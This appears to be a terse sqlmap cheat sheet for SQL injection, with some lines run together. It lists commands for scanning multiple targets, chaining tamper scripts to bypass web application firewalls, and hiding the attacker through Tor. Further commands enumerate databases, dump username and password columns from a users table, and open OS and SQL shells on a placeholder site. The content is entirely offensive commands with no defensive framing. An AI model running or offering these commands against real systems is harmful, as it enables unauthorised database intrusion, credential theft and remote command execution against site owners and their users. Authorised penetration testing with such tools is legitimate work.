sudo sqlmap -m SQLtargets.txt -dbs --batch tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
#WAF bypass using TOR
sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor
Scanning multiple targets
sudo sqlmap -m SQLtargets.txt -dbs --batch
Easy Scanning optionsqlmap -u "http://testsite.com/login.php"Scanning by using torsqlmap -u "http://testsite.com/login.php" --tor --tor-type=SOCKS5Scanning by manually setting the return timesqlmap -u "http://testsite.com/login.php" --time-sec 15
List all databases at the sitesqlmap -u "http://testsite.com/login.php" --dbsList all tables in a specific databasesqlmap -u "http://testsite.com/login.php" -D site_db --tablesDump the contents of a DB tablesqlmap -u "http://testsite.com/login.php" -D site_db -T users –dump
List all columns in a tablesqlmap -u "http://testsite.com/login.php" -D site_db -T users --columnsDump only selected columnssqlmap -u "http://testsite.com/login.php" -D site_db -T users -C username,password --dump
Dump a table from a database when you have admin credentialssqlmap -u "http://testsite.com/login.php" –method "POST" –data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users –dump
Get OS Shellsqlmap --dbms=mysql -u "http://testsite.com/login.php" --os-shell
Get SQL Shellsqlmap --dbms=mysql -u "http://testsite.com/login.php" --sql-shell
Injecting site.xml pages
//Adjust according to underlying DB and target
sqlmap -u "target/sitemap.xml?offset=1" -p offset --level 5 --risk 3 --dbms=MySQL --hostname --test-filter="MySQL >= 5.0.12 stacked queries"
